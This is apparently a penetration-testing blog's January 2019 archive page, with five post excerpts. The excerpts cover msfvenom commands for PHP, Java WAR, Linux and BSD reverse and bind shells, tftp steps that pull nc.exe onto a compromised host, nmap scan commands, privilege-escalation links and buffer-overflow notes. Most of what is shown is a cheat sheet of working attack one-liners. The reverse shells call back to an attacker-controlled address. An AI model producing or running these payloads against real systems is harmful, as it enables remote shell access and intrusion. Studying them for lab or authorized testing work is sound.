Month: January 2019

Total 5 Posts

msfvenom payload

PHP reverse shell msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php Java WAR reverse shell msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war Linux bind shell msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b “\x00\x0a\x0d\x20” -e x86/shikata_ga_nai Linux FreeBSD reverse shell msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o

Continue Reading

File transfer methods

File Transfers limit commands on shell to be non-interactive https://blog.netspi.com/15-ways-to-download-a-file/ TFTP Windows XP and Win 2003 contain tftp client. Windows 7 do not by default tfpt clients are usually non-interactive, so they could work through an obtained shell atftpd –daemon –port 69 /tftp Windows> tftp -i 10.10.10.10 GET nc.exe FTP

Continue Reading

Pentesting resources

Following are some resources but i will update as i find something interesting. These are by no means mine and i am just gathering good information around web. credit goes to original file content owner. windows privilege escalation http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation windows hacking pack https://github.com/51x/WHP windows and linux priv esc https://github.com/AusJock/Privilege-Escalation All

Continue Reading

one stop shop-Pentesting

Scanning: Nmap quick scan nmap -sS -sV -vv -oA quick 10.10.10.10 Nmap full scan nmap -sC -sV -p- -vv -oA full 10.10.10.10 UDP quick scan nmap -sU -sV -vv -oA quick_udp 10.10.10.10 syn scan of all ports nmap -sS –min-rate 5000 –max-retries 1 -p- 10.10.10.10 Unicornscan unicornscan -i tap0 -p

Continue Reading

Buffer Overflow

Buffer over flows are not simple. this post is my own notes if it makes sense feel free to use it. Stack Overflow Find Vulnerable program and possibly starting Skelton script. Attach program to Olle Debugger, and send payload to crash program. Now the fun starts. Step 1: Finding and

Continue Reading